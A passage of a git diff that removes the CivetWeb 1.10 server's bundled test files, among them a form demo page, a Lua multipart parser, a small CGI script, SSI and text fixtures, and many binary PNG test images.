
-	mg.write("Allow: GET, HEAD, PUT, DELETE, OPTIONS\r\n")

-	mg.write("\r\n")

-	return

-

-else

-	mg.write("HTTP/1.0 405 Method Not Allowed\r\n")

-	mg.write("Connection: close\r\n")

-	mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-	mg.write("\r\n")

-	return

-end

diff --git a/thirdparty/civetweb-1.10/test/form.html b/thirdparty/civetweb-1.10/test/form.html
deleted file mode 100644
index 381084c..0000000
--- a/thirdparty/civetweb-1.10/test/form.html
+++ /dev/null
@@ -1,118 +0,0 @@
-<!DOCTYPE HTML>

-<html>

-

-<head>

-  <meta charset="UTF-8">

-  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

-  <title>Example page for HTML form handling</title>

-</head>

-

-<body>

-

-  <!-- HTML forms can use GET or POST, and the encoding can be application/x-www-form-urlencoded or multipart/form-data.

-       If no method is specified (like <form method="method">), GET should be the default method.

-       If no encoding is specified, application/x-www-form-urlencoded should be the default.

-       Submit buttons may overwrite action, method and enctype by using formaction, formmethod and formenctype.

-

-       References:

-       http://www.w3.org/TR/html401/interact/forms.html

-       http://www.w3schools.com/html/html_forms.asp,

-       http://www.w3schools.com/html/html_form_attributes.asp

-       http://www.w3.org/TR/html401/interact/forms.html#adef-enctype

-  -->

-

-

-  <form action="/handle_form.embedded_c.example.callback">

-    See <a href="http://www.w3schools.com/html/html_form_input_types.asp">HTML form tutorial</a>

-    and <a href="http://www.w3.org/TR/html401/interact/forms.html">HTML spec</a>.<br />

-

-    <fieldset>

-      <legend>Text inputs:</legend>

-      A text: <input type="text" name="textin"><br />

-      A password: <input type="password" name="passwordin"><br />

-    </fieldset>

-

-    <fieldset>

-      <legend>Radio set 1:</legend>

-      <input type="radio" name="radio1" value="val1" checked>val1<br />

-      <input type="radio" name="radio1" value="val2">val2<br />

-      <input type="radio" name="radio1" value="val3">val3<br />

-    </fieldset>

-

-    <fieldset>

-      <legend>Radio set 2:</legend>

-      <input type="radio" name="radio2" value="val1" checked>val1<br />

-      <input type="radio" name="radio2" value="val2">val2<br />

-      <input type="radio" name="radio2" value="val3">val3<br />

-    </fieldset>

-

-    <fieldset>

-      <legend>Checkboxes:</legend>

-      <input type="checkbox" name="check1" value="val1" checked>val1<br />

-      <input type="checkbox" name="check2" value="val2">val2<br />

-      <input type="checkbox" name="check3" value="val3">val3<br />

-    </fieldset>

-

-    <fieldset>

-      <legend>HTML5 inputs:</legend>

-      A number: <input type="number" name="numberin" min="1" max="5"><br />

-      A date: <input type="date" name="datein"><br />

-      A color: <input type="color" name="colorin"><br />

-      A range: <input type="range" name="rangein" min="1" max="5"><br />

-      A month: <input type="month" name="monthin"><br />

-      A week: <input type="week" name="weekin"><br />

-      A time: <input type="time" name="timein"><br />

-      A datetime: <input type="datetime" name="datetimen"><br />

-      A datetime-local: <input type="datetime-local" name="datetimelocalin"><br />

-      An email: <input type="email" name="emailin"><br />

-      A search: <input type="search" name="searchin"><br />

-      A tel: <input type="tel" name="telin"><br />

-      An url: <input type="url" name="urlin"><br />

-    </fieldset>

-

-    <fieldset>

-      <legend>Files:</legend>

-      A file: <input type="file" name="filein"><br />

-      Multiple files: <input type="file" name="filesin" multiple><br>

-    </fieldset>

-

-    <fieldset>

-      <legend>Dropdown:</legend>

-      <select name="selectin">

-        <option value="opt1">opt1</option>

-        <option value="opt2">opt2</option>

-        <option value="opt3">opt3</option>

-      </select>

-    </fieldset>

-

-    <fieldset>

-      <legend>Text area:</legend>

-      <textarea name="message" rows="10" cols="30">Text area default text.</textarea>

-    </fieldset>

-

-    <fieldset>

-    <legend>Submit:</legend>

-      <fieldset>

-        <legend>Submit to Lua script:</legend>

-        This will only work if server side Lua scripting is activated and /handle_form.lua can be found on the server.

-        <br>

-        <input type="submit" value="Submit"  formmethod="POST"  formenctype="multipart/form-data"

-         formaction="/handle_form.lua">

-      </fieldset>

-

-      <fieldset>

-        <legend>Submit to callback:</legend>

-        This will work in the embedded_c example. It will call mg_handle_form_data to parse the request.

-        <br>

-        <input type="submit" value="Submit (form default)">

-        <input type="submit" value="Submit (GET)"                 formmethod="GET">

-        <input type="submit" value="Submit (POST)"                formmethod="POST">

-        <input type="submit" value="Submit (POST, url-encoded)"   formmethod="POST"   formenctype="application/x-www-form-urlencoded">

-        <input type="submit" value="Submit (POST, form-data)"     formmethod="POST"   formenctype="multipart/form-data">

-      </fieldset>

-    </fieldset>

-

-  </form>

-</body>

-

-</html>

diff --git a/thirdparty/civetweb-1.10/test/handle_form.lua b/thirdparty/civetweb-1.10/test/handle_form.lua
deleted file mode 100644
index c3694ae..0000000
--- a/thirdparty/civetweb-1.10/test/handle_form.lua
+++ /dev/null
@@ -1,123 +0,0 @@
--- Some basic checks

-if mg.request_info.request_method ~= "POST" or mg.request_info.content_type:lower():sub(1,19) ~= 'multipart/form-data' then

-  mg.write("HTTP/1.0 400 OK\r\n")

-  mg.write("Connection: close\r\n")

-  mg.write("Content-Type: text/plain; charset=utf-8\r\n")

-  mg.write("Cache-Control: max-age=0, must-revalidate\r\n")

-  mg.write("\r\n")

-  mg.write("Bad request\r\n\r\n")

-  return

-end

-

--- HTTP headers

-mg.write("HTTP/1.0 200 OK\r\n")

-mg.write("Connection: close\r\n")

-mg.write("Content-Type: text/plain; charset=utf-8\r\n")

-mg.write("Cache-Control: max-age=0, must-revalidate\r\n")

-mg.write("\r\n")

-

--- Which form sent the data?

-mg.write("Read POST data from " .. mg.request_info.http_headers.Referer .. ":\r\n\r\n")

-

--- Count some data fields

-local fields = 0

-local datasize = 0

-

--- Read the entire body data (POST content) into "bdata" variable.

--- Use a string builder pattern for performance reasons

-stringtab = {}

-bdata = ""

-repeat

-  local add_data = mg.read()

-  if add_data then

-    stringtab[#stringtab+1] = add_data

-  end

-until (add_data == nil);

-bdata = table.concat(stringtab)

-stringtab = nil

-

--- Get the boundary string.

-bs = "--" .. ((mg.request_info.content_type):upper():match("BOUNDARY=(.*)"));

-

--- The POST data has to start with the boundary string.

--- Check this and remove the starting boundary.

-if bdata:sub(1, #bs) ~= bs then

-  error "invalid format of POST data"

-end

-bdata = bdata:sub(#bs)

-

--- The boundary now starts with CR LF.

-bs = "\r\n" .. bs

-

--- Now loop through all the parts

-while #bdata>4 do

-   -- Find the header of new part.

-   part_header_end = bdata:find("\r\n\r\n", 1, true)

-

-   -- Parse the header.

-   local form_field_name, file_name

-   h = bdata:sub(1, part_header_end+2)

-   for key,val in h:gmatch("([^%:\r\n]*)%s*%:%s*([^\r\n]*)\r\n") do

-      if key:upper() == "CONTENT-DISPOSITION" then

-          form_field_name = val:match('name=%"([^%"]*)%"')

-          file_name = val:match('filename=%"([^%"]*)%"')

-      end

-   end

-

-   -- Remove the header from "bdata".

-   bdata = bdata:sub(part_header_end+4)

-

-   -- Find the end of the body by locating the boundary string.

-   local part_body_end = bdata:find(bs, 1, true)

-

-   -- Isolate the content, and drop it from "bdata".

-   local form_field_value = bdata:sub(1,part_body_end-1)

-   bdata = bdata:sub(part_body_end+#bs)

-

-   -- Now the data (file content or field value) is isolated: We know form_field_name and form_field_value.

-   -- Here the script should do something useful with the data. This example just sends it back to the client.

-   if form_field_name then

-     mg.write("Field name: " .. form_field_name .. "\r\n")

-   end

-

-   local len = #form_field_value

-   mg.write("Field data length: " .. len .. "\r\n")

-

-   if file_name then

-     mg.write("File name: " .. file_name .. "\r\n")

-     mg.write("File content:\r\n")

-     local maxlen

-     if len>320 then maxlen=320 else maxlen=len end

-

-     for l=0,maxlen,16 do

-       for m=1,16 do

-         local b = form_field_value:byte(l+m)

-         if (b) then

-           mg.write(string.format("%02x ", b))

-         else

-           mg.write("   ")

-         end

-       end

-       mg.write(" -  " .. form_field_value:sub(l+1,l+16):gsub("[%c%z%s]", " ") .. "\r\n")

-     end

-     if maxlen<len then

-       mg.write(string.format("... (+ %u bytes)\r\n", len-maxlen))

-     end

-

-   else

-     -- not a file

-     if len<50 then

-       mg.write("Field value: " .. form_field_value .. "\r\n")

-     else

-       mg.write("Field value: " .. form_field_value:sub(1, 40) .. " .. (" .. len .. " bytes)\r\n")

-     end

-   end

-

-

-   mg.write("\r\n")

-   fields = fields + 1

-   datasize = datasize + len

-

-end

-

-mg.write("Got " .. fields .. " input fields with " .. datasize .. " bytes total\r\n");

diff --git a/thirdparty/civetweb-1.10/test/hello.cgi b/thirdparty/civetweb-1.10/test/hello.cgi
deleted file mode 100755
index cc96814..0000000
--- a/thirdparty/civetweb-1.10/test/hello.cgi
+++ /dev/null
@@ -1,7 +0,0 @@
-#!/bin/sh
-
-echo "Content-Type: text/plain"
-echo
-
-echo "Query string:"
-echo $QUERY_STRING
diff --git a/thirdparty/civetweb-1.10/test/hello.shtml b/thirdparty/civetweb-1.10/test/hello.shtml
deleted file mode 100644
index d4094cc..0000000
--- a/thirdparty/civetweb-1.10/test/hello.shtml
+++ /dev/null
@@ -1,5 +0,0 @@
-<pre>
-hello.shtml: include "hello.txt":
-<!--#include file="hello.txt" -->
-hello.shtml: end
-</pre>
diff --git a/thirdparty/civetweb-1.10/test/hello.txt b/thirdparty/civetweb-1.10/test/hello.txt
deleted file mode 100644
index 7feddbf..0000000
--- a/thirdparty/civetweb-1.10/test/hello.txt
+++ /dev/null
@@ -1 +0,0 @@
-simple text file
diff --git a/thirdparty/civetweb-1.10/test/hello_gz.txt.gz b/thirdparty/civetweb-1.10/test/hello_gz.txt.gz
deleted file mode 100644
index 7325429..0000000
--- a/thirdparty/civetweb-1.10/test/hello_gz.txt.gz
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/hello_gz_unzipped.txt b/thirdparty/civetweb-1.10/test/hello_gz_unzipped.txt
deleted file mode 100644
index bde6e8a..0000000
--- a/thirdparty/civetweb-1.10/test/hello_gz_unzipped.txt
+++ /dev/null
@@ -1 +0,0 @@
-hello from a zipped text file
diff --git a/thirdparty/civetweb-1.10/test/html_esc.lua b/thirdparty/civetweb-1.10/test/html_esc.lua
deleted file mode 100644
index addfe76..0000000
--- a/thirdparty/civetweb-1.10/test/html_esc.lua
+++ /dev/null
@@ -1,60 +0,0 @@
-htmlEscape = {    "&#x263a;", "&#x263b;", "&#x2665;", "&#x2666;", "&#x2663;", "&#x2660;", "&#x2022;", -- ASCII 1-7 (symbols for control characters, see code page 437)

-      "&#x25d8;", "&#x25cb;", "&#x25d9;", "&#x2642;", "&#x2640;", "&#x266a;", "&#x266b;", "&#x263c;", -- ASCII 8-15

-      "&#x25ba;", "&#x25c4;", "&#x2195;", "&#x203c;", "&#x00b6;", "&#x00a7;", "&#x25ac;", "&#x21a8;", -- ASCII 16-23

-      "&#x2191;", "&#x2193;", "&#x21a8;", "&#x2190;", "&#x221f;", "&#x2192;", "&#x25b2;", "&#x25bc;", -- ASCII 24-31

-      " ",        "!",        "&quot;",   "#",        "$",        "%",        "&amp;",    "'",        -- ASCII 32-39

-      "(",        ")",        "*",        "+",        ",",        "-",        ".",        "/",        -- ASCII 40-47

-      "0",        "1",        "2",        "3",        "4",        "5",        "6",        "7",        -- ASCII 48-55

-      "8",        "9",        ":",        ";",        "&lt;",     "=",        "&gt;",     "?",        -- ASCII 56-63

-      "@",        "A",        "B",        "C",        "D",        "E",        "F",        "G",        -- ASCII 64-71

-      "H",        "I",        "J",        "K",        "L",        "M",        "N",        "O",        -- ASCII 72-79

-      "P",        "Q",        "R",        "S",        "T",        "U",        "V",        "W",        -- ASCII 80-87

-      "X",        "Y",        "Z",        "[",        "\\",       "]",        "^",        "_",        -- ASCII 88-95

-      "`",        "a",        "b",        "c",        "d",        "e",        "f",        "g",        -- ASCII 96-103

-      "h",        "i",        "j",        "k",        "l",        "m",        "n",        "o",        -- ASCII 104-111

-      "p",        "q",        "r",        "s",        "t",        "u",        "v",        "w",        -- ASCII 112-119

-      "x",        "y",        "z",        "{",        "|",        "}",        "~",        "&#x2302;", -- ASCII 120-127

-      "&Ccedil;", "&uuml;",   "&eacute;", "&acirc;",  "&auml;",   "&agrave;", "&aring;",  "&ccedil;", -- 128-135 (dos code page 850)

-      "&ecirc;",  "&euml;",   "&egrave;", "&iuml;",   "&icirc;",  "&igrave;", "&Auml;",   "&Aring;",  -- 136-143

-      "&Eacute;", "&aelig;",  "&AElig;",  "&ocirc;",  "&ouml;",   "&ograve;", "&ucirc;",  "&ugrave;", -- 144-151

-      "&yuml;",   "&Ouml;",   "&Uuml;",   "&oslash;", "&#x00a3;", "&Oslash;", "&#x00d7;", "&#x0192;", -- 152-159

-      "&aacute;", "&iacute;", "&oacute;", "&uacute;", "&ntilde;", "&Ntilde;", "&#x00aa;", "&#x00ba;", -- 160-167

-      "&#x00bf;", "&#x00ae;", "&#x00ac;", "&#x00bd;", "&#x00bc;", "&#x00a1;", "&#x00ab;", "&#x00bb;", -- 168-175

-      "&#x2591;", "&#x2592;", "&#x2593;", "&#x2502;", "&#x2524;", "&Aacute;", "&Acirc;",  "&Agrave;", -- 176-183

-      "&#x00a9;", "&#x2563;", "&#x2551;", "&#x2557;", "&#x255d;", "&cent;",   "&#x00a5;", "&#x2510;", -- 184-191

-      "&#x2514;", "&#x2534;", "&#x252c;", "&#x251c;", "&#x2500;", "&#x253c;", "&atilde;", "&Atilde;", -- 192-199

-      "&#x255a;", "&#x2554;", "&#x2569;", "&#x2566;", "&#x2560;", "&#x2550;", "&#x256c;", "&#x00a4;", -- 200-207

-      "&eth;",    "&ETH;",    "&Ecirc;",  "&Euml;",   "&Egrave;", "&#x0131;", "&Iacute;", "&Icirc;",  -- 208-215

-      "&Iuml;",   "&#x2518;", "&#x250c;", "&#x2588;", "&#x2584;", "&#x00a6;", "&Igrave;", "&#x2580;", -- 216-223

-      "&Oacute;", "&szlig;",  "&Ocirc;",  "&Ograve;", "&otilde;", "&Otilde;", "&#x00b5;", "&thorn;",  -- 224-231

-      "&THORN;",  "&Uacute;", "&Ucirc;",  "&Ugrave;", "&yacute;", "&Yacute;", "&#x00af;", "&#x00b4;", -- 232-239

-      "&equiv;",  "&#x00b1;", "&#x2017;", "&#x00be;", "&#x00b6;", "&#x00a7;", "&#x00f7;", "&#x00b8;", -- 240-247

-      "&#x00b0;", "&#x00a8;", "&#x00b7;", "&#x00b9;", "&#x00b3;", "&#x00b2;", "&#x25a0;", "&#9633;",  -- 248-255 (use empty box for 255)

-};

-htmlEscape[0] = "&middot;" -- in this table, we use a 8 bit character set, where every has a different graphical representation

-

--- the conversion table should work as a convertion function for strings as well

-setmetatable(htmlEscape, {__call = function (tab,str) return string.gsub(str, ".", function (c) return tab[c:byte()] end) end})

-

-

-function htmlEsc(txt)

-    s = txt:gsub("%&", "&amp;")

-    s = s:gsub("%<", "&lt;")

-    return s:gsub("%>", "&gt;")

-end

-

-

-function iso8859_1_to_utf8(txt)

-    local s = txt:gsub(".",

-      function (c)

-        local b = c:byte()

-        if b < 128 then

-          return c

-        elseif b < 192 then

-          return string.char(194, b)

-        else

-          return string.char(195, b-64)

-        end

-      end)

-    return s

-end

diff --git a/thirdparty/civetweb-1.10/test/imagetest/00.png b/thirdparty/civetweb-1.10/test/imagetest/00.png
deleted file mode 100644
index 36160d9..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/00.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/01.png b/thirdparty/civetweb-1.10/test/imagetest/01.png
deleted file mode 100644
index 725bf68..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/01.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/02.png b/thirdparty/civetweb-1.10/test/imagetest/02.png
deleted file mode 100644
index 5b5edf3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/02.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/03.png b/thirdparty/civetweb-1.10/test/imagetest/03.png
deleted file mode 100644
index 8b7d772..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/03.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/04.png b/thirdparty/civetweb-1.10/test/imagetest/04.png
deleted file mode 100644
index dc64871..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/04.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/05.png b/thirdparty/civetweb-1.10/test/imagetest/05.png
deleted file mode 100644
index 5cea521..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/05.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/06.png b/thirdparty/civetweb-1.10/test/imagetest/06.png
deleted file mode 100644
index cb10122..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/06.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/07.png b/thirdparty/civetweb-1.10/test/imagetest/07.png
deleted file mode 100644
index 70134c5..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/07.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/08.png b/thirdparty/civetweb-1.10/test/imagetest/08.png
deleted file mode 100644
index ee7c3d8..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/08.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/09.png b/thirdparty/civetweb-1.10/test/imagetest/09.png
deleted file mode 100644
index 6373472..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/09.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/10.png b/thirdparty/civetweb-1.10/test/imagetest/10.png
deleted file mode 100644
index 3823e3a..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/10.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/11.png b/thirdparty/civetweb-1.10/test/imagetest/11.png
deleted file mode 100644
index fa3f411..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/11.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/12.png b/thirdparty/civetweb-1.10/test/imagetest/12.png
deleted file mode 100644
index eec6ee1..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/12.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/13.png b/thirdparty/civetweb-1.10/test/imagetest/13.png
deleted file mode 100644
index 2dcebc5..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/13.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/14.png b/thirdparty/civetweb-1.10/test/imagetest/14.png
deleted file mode 100644
index 2a08667..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/14.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/15.png b/thirdparty/civetweb-1.10/test/imagetest/15.png
deleted file mode 100644
index 6d57b59..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/15.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/16.png b/thirdparty/civetweb-1.10/test/imagetest/16.png
deleted file mode 100644
index e4611a3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/16.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/17.png b/thirdparty/civetweb-1.10/test/imagetest/17.png
deleted file mode 100644
index 1975b73..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/17.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/18.png b/thirdparty/civetweb-1.10/test/imagetest/18.png
deleted file mode 100644
index 7090c12..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/18.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/19.png b/thirdparty/civetweb-1.10/test/imagetest/19.png
deleted file mode 100644
index 236f3c3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/19.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/20.png b/thirdparty/civetweb-1.10/test/imagetest/20.png
deleted file mode 100644
index 1c7e5a3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/20.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/21.png b/thirdparty/civetweb-1.10/test/imagetest/21.png
deleted file mode 100644
index e8d9344..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/21.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/22.png b/thirdparty/civetweb-1.10/test/imagetest/22.png
deleted file mode 100644
index fd8d4aa..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/22.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/23.png b/thirdparty/civetweb-1.10/test/imagetest/23.png
deleted file mode 100644
index 3772ec5..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/23.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/24.png b/thirdparty/civetweb-1.10/test/imagetest/24.png
deleted file mode 100644
index 2b458f9..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/24.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/25.png b/thirdparty/civetweb-1.10/test/imagetest/25.png
deleted file mode 100644
index 53d4757..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/25.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/26.png b/thirdparty/civetweb-1.10/test/imagetest/26.png
deleted file mode 100644
index d4a101c..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/26.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/27.png b/thirdparty/civetweb-1.10/test/imagetest/27.png
deleted file mode 100644
index a40fc51..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/27.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/28.png b/thirdparty/civetweb-1.10/test/imagetest/28.png
deleted file mode 100644
index 12d72a6..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/28.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/29.png b/thirdparty/civetweb-1.10/test/imagetest/29.png
deleted file mode 100644
index 0638d45..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/29.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/30.png b/thirdparty/civetweb-1.10/test/imagetest/30.png
deleted file mode 100644
index 2446c60..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/30.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/31.png b/thirdparty/civetweb-1.10/test/imagetest/31.png
deleted file mode 100644
index bbcbf51..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/31.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/32.png b/thirdparty/civetweb-1.10/test/imagetest/32.png
deleted file mode 100644
index b40f395..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/32.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/33.png b/thirdparty/civetweb-1.10/test/imagetest/33.png
deleted file mode 100644
index 7293ea5..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/33.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/34.png b/thirdparty/civetweb-1.10/test/imagetest/34.png
deleted file mode 100644
index fb3de9c..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/34.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/35.png b/thirdparty/civetweb-1.10/test/imagetest/35.png
deleted file mode 100644
index 4635bb0..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/35.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/36.png b/thirdparty/civetweb-1.10/test/imagetest/36.png
deleted file mode 100644
index 1a300ef..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/36.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/37.png b/thirdparty/civetweb-1.10/test/imagetest/37.png
deleted file mode 100644
index 6f44faf..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/37.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/38.png b/thirdparty/civetweb-1.10/test/imagetest/38.png
deleted file mode 100644
index 1f0b810..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/38.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/39.png b/thirdparty/civetweb-1.10/test/imagetest/39.png
deleted file mode 100644
index 02cee96..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/39.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/40.png b/thirdparty/civetweb-1.10/test/imagetest/40.png
deleted file mode 100644
index 5dd1fd4..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/40.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/41.png b/thirdparty/civetweb-1.10/test/imagetest/41.png
deleted file mode 100644
index 734b9d3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/41.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/42.png b/thirdparty/civetweb-1.10/test/imagetest/42.png
deleted file mode 100644
index c19bc8f..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/42.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/43.png b/thirdparty/civetweb-1.10/test/imagetest/43.png
deleted file mode 100644
index 0d58081..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/43.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/44.png b/thirdparty/civetweb-1.10/test/imagetest/44.png
deleted file mode 100644
index 5745c68..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/44.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/45.png b/thirdparty/civetweb-1.10/test/imagetest/45.png
deleted file mode 100644
index e8411b7..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/45.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/46.png b/thirdparty/civetweb-1.10/test/imagetest/46.png
deleted file mode 100644
index 532d175..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/46.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/47.png b/thirdparty/civetweb-1.10/test/imagetest/47.png
deleted file mode 100644
index ca30f6f..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/47.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/48.png b/thirdparty/civetweb-1.10/test/imagetest/48.png
deleted file mode 100644
index 0c20c82..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/48.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/49.png b/thirdparty/civetweb-1.10/test/imagetest/49.png
deleted file mode 100644
index a4e6799..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/49.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/50.png b/thirdparty/civetweb-1.10/test/imagetest/50.png
deleted file mode 100644
index e78c9f1..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/50.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/51.png b/thirdparty/civetweb-1.10/test/imagetest/51.png
deleted file mode 100644
index dd0aeb7..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/51.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/52.png b/thirdparty/civetweb-1.10/test/imagetest/52.png
deleted file mode 100644
index 7672eef..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/52.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/53.png b/thirdparty/civetweb-1.10/test/imagetest/53.png
deleted file mode 100644
index 5537179..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/53.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/54.png b/thirdparty/civetweb-1.10/test/imagetest/54.png
deleted file mode 100644
index d8fb264..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/54.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/55.png b/thirdparty/civetweb-1.10/test/imagetest/55.png
deleted file mode 100644
index cfa47a8..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/55.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/56.png b/thirdparty/civetweb-1.10/test/imagetest/56.png
deleted file mode 100644
index 51d7bc7..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/56.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/57.png b/thirdparty/civetweb-1.10/test/imagetest/57.png
deleted file mode 100644
index 645b8ec..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/57.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/58.png b/thirdparty/civetweb-1.10/test/imagetest/58.png
deleted file mode 100644
index eb861f5..0000000
